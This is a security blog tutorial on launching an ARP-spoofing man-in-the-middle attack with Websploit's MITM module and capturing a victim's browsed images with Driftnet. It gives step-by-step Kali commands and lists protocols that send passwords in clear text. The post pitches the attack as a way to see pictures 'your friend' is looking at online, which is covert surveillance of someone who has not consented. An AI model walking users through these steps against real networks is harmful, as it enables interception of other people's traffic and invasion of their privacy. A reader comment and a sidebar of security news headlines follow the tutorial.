Categories: Sniffing & Spoofing

Driftnet – Tool used to Capture Images that Your Friend looking at Online

How we can launch a MITM attack with Websploit and the Driftnet – Tool used to capture images.

MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.

Step 1: Need to install websploit in Kali if not present.

root@kali:~# apt-get install websploit

Step2: To Run the websploit

root@kali:~# websploit

Step 3: Next we need to list the modules with the websploit.

wsf > show modules

Step 4: Need to select network/mitm under Network modules.

wsf > use network/mitm
wsf:MITM > show options

Interface: Need to specify the network adapter interface based on our network adapter.

  • set Interface eth0
  • set Interface wlan0

Router: Need to specify Router IP, which can be found with the command route -n.

set Router (Gateway IP)

Target: The victim machine IP address, can be found with ipconfig for Windows and ifconfig for Linux.

Step 5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occur after that sniffers will start up.

wsf:MITM > run

Step 6: Now go down to the victim machine and start surfing, all the images would be captured by drifnet.

Here you can find the pictures that your friend watching online.

Protocols Vulnerable to Sniffing

  • HTTP: Sends passwords in clear text
  • TELNET: Transfer commands in plain text
  • SNMP: Sends passwords in clear text
  • POP: Sends passwords in clear text
  • FTP: Sends passwords in clear text
  • NNTP: Sends passwords in clear text
  • IMAP: Sends passwords in clear text

If you have any doubt please don’t hesitate to leave a comment.

Also, find more Tutorials with Kali Linux

Gurubaran

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

View Comments

  • as you mentioned above (Victim machine IP address, can be found with ipconfig for windows and ifconfig for Linux.) for this we need the physical access to the victims machine right? I'm confused here please help me!

Leave a Comment
Share
Published by
Gurubaran
Tags: ARPDriftnetspoofingwebsploit
2 years ago

Recent Posts

GitLab Vulnerabilities Allow Attackers to Bypass Security and Run Arbitrary Scripts

GitLab has urgently released security updates to address multiple high-severity vulnerabilities in its platform that…

58 minutes ago

LibreOffice Flaws Allow Attackers to Run Malicious Files on Windows

A high-severity security vulnerability (CVE-2025-0514) in LibreOffice, the widely used open-source office suite, has been…

1 hour ago

Cisco Nexus Switch Vulnerability Allows Attackers to Cause DoS

Cisco Systems has disclosed a high-severity vulnerability (CVE-2025-20111) in its Nexus 3000 and 9000 Series…

2 hours ago

Silver Fox APT Hackers Target Healthcare Services to Steal Sensitive Data

A sophisticated cyber campaign orchestrated by the Chinese Advanced Persistent Threat (APT) group, Silver Fox,…

11 hours ago

Ghostwriter Malware Targets Government Organizations with Weaponized XLS File

A new wave of cyberattacks attributed to the Ghostwriter Advanced Persistent Threat (APT) group has…

11 hours ago

LCRYX Ransomware Attacks Windows Machines by Blocking Registry Editor and Task Manager

The LCRYX ransomware, a malicious VBScript-based threat, has re-emerged in February 2025 after its initial…

11 hours ago